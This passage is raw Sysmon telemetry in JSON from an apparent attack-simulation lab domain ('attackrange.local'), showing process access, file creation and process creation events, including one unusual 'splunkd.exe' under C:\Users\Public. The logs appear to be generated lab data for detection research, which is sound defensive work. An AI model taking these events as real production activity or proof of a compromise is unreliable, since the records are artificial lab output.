(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.623","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8814,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:57.685\r\nProcessGuid: {E2A3D6B1-139E-5F25-0000-001053941000}\r\nProcessId: 1576\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\628-0\\System.Workflow.ComponentModel.dll\r\nCreationUtcTime: 2020-08-01 07:02:57.685","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:57.685","ProcessGuid":"{E2A3D6B1-139E-5F25-0000-001053941000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\628-0\\System.Workflow.ComponentModel.dll","CreationUtcTime":"2020-08-01 07:02:57.685","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8815,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.779\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-0010A69D1000}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.779","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-0010A69D1000}","TargetProcessId":"4348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8816,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.779\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-0010A69D1000}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.779","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-0010A69D1000}","TargetProcessId":"4348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8817,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.779\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-0010A69D1000}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.779","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-0010A69D1000}","TargetProcessId":"4348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8818,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.857\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-00100BA21000}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.857","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00100BA21000}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8819,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.857\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-00100BA21000}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.857","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00100BA21000}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8820,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-00100BA21000}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00100BA21000}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8821,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nProcessGuid: {E2A3D6B1-13A1-5F25-0000-001005A71000}\r\nProcessId: 2968\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","ProcessGuid":"{E2A3D6B1-13A1-5F25-0000-001005A71000}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
